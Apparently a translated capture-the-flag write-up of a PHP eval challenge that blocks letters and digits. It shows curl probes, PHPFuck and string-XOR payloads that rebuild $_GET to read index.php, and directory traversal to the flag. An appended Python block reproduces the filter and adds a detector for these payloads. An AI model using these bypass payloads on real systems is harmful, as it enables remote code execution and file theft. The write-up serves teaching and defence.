You must defeat and pass through many enemies to get to it, and even then, what you desire could only be called upon with great hardship
Click here
Accessing it only displayed the following message.
$ curl https://ch7.sbug.se/
No 'command' param received.
Including the requested parameter just gets you scolded.
$ curl https://ch7.sbug.se/?command=whoami
Are you trying to inject malicious code?!
$ curl https://ch7.sbug.se/?command=a
Are you trying to inject malicious code?!
It could not be that no characters at all are accepted, so I tried a few, and symbols seemed to get through, as shown below.
$ curl "https://ch7.sbug.se/?command=@" --head
HTTP/2 500
~~~
$ curl "https://ch7.sbug.se/?command='" --head
HTTP/2 500
~~~
The 500s were a problem, but `;` came back with a 200.
$ curl 'https://ch7.sbug.se/?command=;' --head
HTTP/2 200
~~~
It looks like code can be executed, so I tried arrays and the like.
$ curl 'https://ch7.sbug.se/?command=[]^[];' --head
HTTP/2 200
~~~
It is executing.
This is where I remembered PHPFuck.
//Satoki
(([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])])
URL-encode it and execute.
$ curl 'https://ch7.sbug.se/?command=%28%28%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%29%28%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%
5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%29;'
Satoki
Now any code could be run, but this form is far too long, so the next step is to make alphabetic characters usable.
It is known that `$_ = "_GET"` can be written as `$_="`{{{"^"?<>/";`.
Using `$_GET[_]($_GET[__]($_GET[___]))`, I perform `printf(file_get_contents(index.php))`.
Eliminating the literal GET gives `$_="`{{{"^"?<>/";${$_}[_](${$_}[__](${$_}[___]));`, so I access that and retrieve the file.
#https://ch7.sbug.se/?command=$_="`{{{"^"?<>/";${$_}[_](${$_}[__](${$_}[___]));&_=printf&__=file_get_contents&___=index.php
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=index.php'
<?php
$EOL_W = "\r\n"; // Windows CR+LF
$EOL_L = "\n"; // Linux LF
if(isset($_GET["command"])){
    $_GET["command"] = str_replace($EOL_W, "", $_GET["command"]);
    $_GET["command"] = str_replace($EOL_L, "", $_GET["command"]);
    if(!preg_match("/[A-Za-z0-9]/is", $_GET["command"])){
        eval($_GET["command"]);
    }else{
        die("Are you trying to inject malicious code?!");
    }
}else{
    die("No 'command' param received.");
}
?>
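An added Python check, not part of the writeup, that reproduces the filter from the index.php above, verifies that `"`{{{" ^ "?<>/"` really is `_GET`, and shows why the alphanumeric blocklist passes the payloads used here. The `looks_like_symbol_only_code` detector and the sample query values are my own assumptions, modelled on the requests in the writeup.

```python
import re

# The filter from the challenge's index.php, reproduced in Python:
# strip CR/LF, then refuse anything containing an ASCII letter or digit.
ALNUM = re.compile(r"[A-Za-z0-9]")

def filter_allows(command: str) -> bool:
    """True if the challenge's filter would hand this string to eval()."""
    stripped = command.replace("\r\n", "").replace("\n", "")
    return ALNUM.search(stripped) is None

def xor_strings(a: str, b: str) -> str:
    """Byte-wise XOR of two equal-length strings, as PHP's ^ does on strings."""
    if len(a) != len(b):
        raise ValueError("operands must have equal length")
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))

# Log-side signals for a 'command' value that slipped past the filter (assumed
# heuristics): two quoted symbol-only strings joined by ^ (string XOR), or the
# []^[[]] building block of PHPFuck.
XOR_IDIOM = re.compile(r'"[^"A-Za-z0-9]*"\s*\^\s*"[^"A-Za-z0-9]*"')
PHPFUCK_IDIOM = re.compile(r"\[\]\s*\^\s*\[")

def looks_like_symbol_only_code(command: str) -> bool:
    """Heuristic: the filter passes it AND it uses a string-XOR or PHPFuck idiom."""
    if not filter_allows(command):
        return False
    return bool(XOR_IDIOM.search(command) or PHPFUCK_IDIOM.search(command))

# Constructed sample query values with the expected detector verdict.
SAMPLES = {
    "whoami": False,                 # blocked by the filter, never reaches eval
    ";": False,                      # passes the filter but is harmless noise
    "[]^[];": True,                  # PHPFuck probe from the writeup
    '$_="`{{{"^"?<>/";${$_}[_](${$_}[__](${$_}[___]));': True,  # string-XOR payload
}

def classify_all() -> dict:
    """Run the detector over every sample value."""
    return {cmd: looks_like_symbol_only_code(cmd) for cmd in SAMPLES}
```

The detector only narrows what a reviewer has to read in access logs; it does not make the filter safe, since the actual fix is to never pass request data to eval().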
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=flag'
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=../flag'
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=../../flag'
SBCTF{7h3r3_4nd_B4ck_4g41n}
Walking up the directory tree, I was lucky enough to get the flag.
If you cannot find where it is, just execute a command.